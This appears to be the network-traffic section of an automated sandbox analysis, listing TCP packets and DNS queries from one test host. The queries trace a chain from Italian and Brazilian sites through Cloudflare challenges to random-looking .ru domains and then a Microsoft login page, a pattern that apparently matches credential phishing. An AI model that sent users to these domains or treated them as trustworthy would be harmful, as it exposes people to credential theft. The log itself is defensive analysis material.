                                                                                                        Jan 9, 2025 17:18:39.951328993 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:39.951409101 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:39.951714039 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:39.951729059 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.426016092 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.426425934 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:40.426454067 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.426808119 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.427131891 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:40.427196980 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.427285910 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:40.471350908 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.549077988 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.549211979 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:40.549305916 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:40.550004005 CET49765443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:18:40.550021887 CET44349765104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.291203976 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:18:55.291316032 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.291446924 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:18:55.291817904 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:18:55.291853905 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.940496922 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.940965891 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:18:55.941031933 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.941512108 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.941955090 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:18:55.942061901 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:18:55.989722013 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:19:03.113303900 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.113352060 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.113420010 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.113662958 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.113679886 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.645987034 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.646369934 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.646410942 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.646861076 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.647209883 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.647327900 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.647335052 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.647453070 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.647496939 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.647593975 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.647633076 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.912761927 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.912843943 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.912867069 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.912894964 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.912938118 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.912940025 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.912961960 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.913017035 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.913419962 CET49768443192.168.2.17104.18.94.41
                                                                                                        Jan 9, 2025 17:19:03.913444996 CET44349768104.18.94.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.915949106 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:03.915999889 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.916086912 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:03.916306019 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:03.916317940 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.971280098 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:03.971332073 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.971415043 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:03.971734047 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:03.971755028 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.380954027 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.381334066 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:04.381351948 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.381719112 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.382198095 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:04.382263899 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.382365942 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:04.423337936 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.435619116 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.435898066 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.435914040 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.437145948 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.437232971 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438359022 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438375950 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438429117 CET44349770104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.438483953 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438484907 CET49770443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438855886 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.438904047 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.438972950 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.439176083 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.439193010 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.537127018 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.537210941 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.537555933 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:04.538142920 CET49769443192.168.2.17104.18.95.41
                                                                                                        Jan 9, 2025 17:19:04.538162947 CET44349769104.18.95.41192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.928807974 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.929141998 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.929168940 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.930187941 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.930270910 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.931401968 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.931546926 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.931634903 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:04.931648016 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:04.985847950 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:05.487524033 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.487639904 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.487735987 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:05.499967098 CET49771443192.168.2.17104.21.48.1
                                                                                                        Jan 9, 2025 17:19:05.499989986 CET44349771104.21.48.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.756987095 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:05.757028103 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.757231951 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:05.757421970 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:05.757438898 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.843842983 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.843919992 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.843977928 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:19:06.238919020 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.239274979 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.239291906 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.240299940 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.240370035 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.240689039 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.240753889 CET44349774104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.240763903 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.240763903 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.240863085 CET49774443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.241075039 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.241137028 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.241209030 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.241446018 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.241461992 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.601629019 CET49767443192.168.2.17216.58.212.132
                                                                                                        Jan 9, 2025 17:19:06.601674080 CET44349767216.58.212.132192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.701086998 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.701379061 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.701406002 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.702440977 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.702519894 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.702825069 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.702902079 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.703011036 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:06.703026056 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.742734909 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:07.303853989 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:07.304097891 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:07.304157972 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:07.304722071 CET49775443192.168.2.17104.21.96.1
                                                                                                        Jan 9, 2025 17:19:07.304744959 CET44349775104.21.96.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:22.580873013 CET49698443192.168.2.1740.126.32.72
                                                                                                        Jan 9, 2025 17:19:22.586766958 CET4434969840.126.32.72192.168.2.17
                                                                                                        Jan 9, 2025 17:19:22.586858034 CET49698443192.168.2.1740.126.32.72
                                                                                                        Jan 9, 2025 17:19:24.812459946 CET49700443192.168.2.1740.126.32.72
                                                                                                        Jan 9, 2025 17:19:24.817457914 CET4434970040.126.32.72192.168.2.17
                                                                                                        Jan 9, 2025 17:19:24.817543030 CET49700443192.168.2.1740.126.32.72
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 9, 2025 17:17:50.624418974 CET5685653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:50.624717951 CET5394453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:50.630019903 CET53571651.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:50.644156933 CET53548731.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:50.674429893 CET53539441.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:50.675827980 CET53568561.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:51.829248905 CET53533081.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:51.830884933 CET5273853192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:51.831069946 CET5406653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:52.055691957 CET53527381.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:52.261951923 CET53540661.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:52.855866909 CET6240353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:52.856421947 CET5489153192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:53.676568031 CET6267853192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:53.676700115 CET6150353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:53.687563896 CET5480053192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:53.687694073 CET5470353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:53.694561005 CET53547031.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:53.694943905 CET53548001.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:53.901110888 CET53615031.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:53.954433918 CET53626781.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:54.730449915 CET5076253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:54.730704069 CET5473653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:54.738662004 CET53547361.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:55.229506969 CET5788653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:55.229734898 CET5146853192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:55.236423016 CET53514681.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:55.236455917 CET53578861.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:17:55.385005951 CET5877553192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:55.385164976 CET6321953192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:17:55.395092010 CET53632191.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:00.309060097 CET5704553192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:08.752182007 CET53652201.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:27.605127096 CET53543821.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:30.833007097 CET5396453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:30.833161116 CET5487453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:30.890892982 CET53539641.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:30.934773922 CET53548741.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.264821053 CET5024653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.268625975 CET6495253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.271733046 CET53502461.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.275536060 CET53649521.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.279042006 CET5087553192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.280889034 CET5072653192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.286190987 CET53508751.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.288036108 CET53507261.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.293171883 CET4983253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.293329000 CET5104253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:32.299787998 CET53510421.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:32.300154924 CET53498321.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.068876028 CET5131753192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.069084883 CET5872353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.075484991 CET53513171.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.075525045 CET53587231.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.085525990 CET5162753192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.085686922 CET6422953192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.092395067 CET53642291.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.092873096 CET53516271.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.600701094 CET5062453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.600702047 CET4991453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.607243061 CET53506241.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.607625961 CET53499141.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.614824057 CET4963153192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.615216970 CET5290253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:33.621596098 CET53496311.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:33.622150898 CET53529021.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:35.339066029 CET6326253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:35.339416981 CET5302453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:18:35.346287012 CET53632621.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:35.362754107 CET53530241.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:50.102222919 CET53646001.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:50.468193054 CET53496461.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:18:58.010265112 CET138138192.168.2.17192.168.2.255
                                                                                                        Jan 9, 2025 17:19:03.918540955 CET5708153192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:03.918670893 CET5446953192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:03.929122925 CET53544691.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET53570811.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.524759054 CET5505753192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:05.524940968 CET5078353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:05.548980951 CET5609253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:05.549097061 CET5496253192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:05.598437071 CET53549621.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET53560921.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:06.601988077 CET6393053192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:06.602118015 CET5198053192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:06.609076977 CET53519801.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:08.680102110 CET6284753192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:08.680103064 CET6352453192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:08.689701080 CET53635241.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:09.774461985 CET5506553192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:09.774662971 CET5618353192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:09.781598091 CET53550651.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:09.782593012 CET53561831.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:14.744477987 CET53539821.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:20.272887945 CET53587591.1.1.1192.168.2.17
                                                                                                        Jan 9, 2025 17:19:35.341372013 CET5268153192.168.2.171.1.1.1
                                                                                                        Jan 9, 2025 17:19:35.341372013 CET5794453192.168.2.171.1.1.1
                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Jan 9, 2025 17:17:52.262047052 CET192.168.2.171.1.1.1c24b(Port unreachable)Destination Unreachable
                                                                                                        Jan 9, 2025 17:18:30.934875011 CET192.168.2.171.1.1.1c289(Port unreachable)Destination Unreachable
                                                                                                        Jan 9, 2025 17:18:35.362835884 CET192.168.2.171.1.1.1c22a(Port unreachable)Destination Unreachable
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 9, 2025 17:17:50.624418974 CET192.168.2.171.1.1.10x1d8fStandard query (0)www.teleboario.itA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:50.624717951 CET192.168.2.171.1.1.10x61ceStandard query (0)www.teleboario.it65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:51.830884933 CET192.168.2.171.1.1.10x975cStandard query (0)plasticoscorrea.com.brA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:51.831069946 CET192.168.2.171.1.1.10x6f3dStandard query (0)plasticoscorrea.com.br65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:52.855866909 CET192.168.2.171.1.1.10xd53bStandard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:52.856421947 CET192.168.2.171.1.1.10x66bcStandard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.676568031 CET192.168.2.171.1.1.10x9595Standard query (0)plasticoscorrea.com.brA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.676700115 CET192.168.2.171.1.1.10x7a30Standard query (0)plasticoscorrea.com.br65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.687563896 CET192.168.2.171.1.1.10x1b0eStandard query (0)picsum.photosA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.687694073 CET192.168.2.171.1.1.10x8856Standard query (0)picsum.photos65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:54.730449915 CET192.168.2.171.1.1.10xabcaStandard query (0)fastly.picsum.photosA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:54.730704069 CET192.168.2.171.1.1.10xeec6Standard query (0)fastly.picsum.photos65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.229506969 CET192.168.2.171.1.1.10x3053Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.229734898 CET192.168.2.171.1.1.10x4f1Standard query (0)www.google.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.385005951 CET192.168.2.171.1.1.10x9e5aStandard query (0)fastly.picsum.photosA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.385164976 CET192.168.2.171.1.1.10xe666Standard query (0)fastly.picsum.photos65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:00.309060097 CET192.168.2.171.1.1.10x43d9Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:30.833007097 CET192.168.2.171.1.1.10xfddbStandard query (0)nokixa.qemitorn.ruA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:30.833161116 CET192.168.2.171.1.1.10x5443Standard query (0)nokixa.qemitorn.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.264821053 CET192.168.2.171.1.1.10x9177Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.268625975 CET192.168.2.171.1.1.10x9075Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.279042006 CET192.168.2.171.1.1.10xeec4Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.280889034 CET192.168.2.171.1.1.10x486eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.293171883 CET192.168.2.171.1.1.10x963Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.293329000 CET192.168.2.171.1.1.10x976aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.068876028 CET192.168.2.171.1.1.10x8780Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.069084883 CET192.168.2.171.1.1.10x8138Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.085525990 CET192.168.2.171.1.1.10x8b3aStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.085686922 CET192.168.2.171.1.1.10xb8a8Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.600701094 CET192.168.2.171.1.1.10x6d6bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.600702047 CET192.168.2.171.1.1.10x7b9bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.614824057 CET192.168.2.171.1.1.10x12a2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.615216970 CET192.168.2.171.1.1.10x8503Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:35.339066029 CET192.168.2.171.1.1.10xcac9Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:35.339416981 CET192.168.2.171.1.1.10x3acfStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.918540955 CET192.168.2.171.1.1.10x9feStandard query (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ruA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.918670893 CET192.168.2.171.1.1.10x3dbfStandard query (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.524759054 CET192.168.2.171.1.1.10x8f2aStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
